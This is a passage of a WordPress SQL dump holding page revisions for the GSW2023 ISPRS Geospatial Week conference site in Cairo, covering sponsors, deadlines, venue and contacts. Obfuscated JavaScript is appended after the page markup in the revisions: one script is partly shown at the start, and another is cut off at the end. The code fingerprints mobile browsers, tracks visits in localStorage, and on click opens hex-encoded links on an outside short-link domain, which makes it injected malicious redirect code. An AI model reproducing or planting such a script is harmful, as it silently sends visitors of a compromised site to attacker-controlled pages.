wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:58:58','2023-05-17 05:58:58','',3066,'https://gsw2023.com/?p=4538',0,'revision','',0),
(4539,1,'2023-05-17 06:00:00','2023-05-17 06:00:00','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x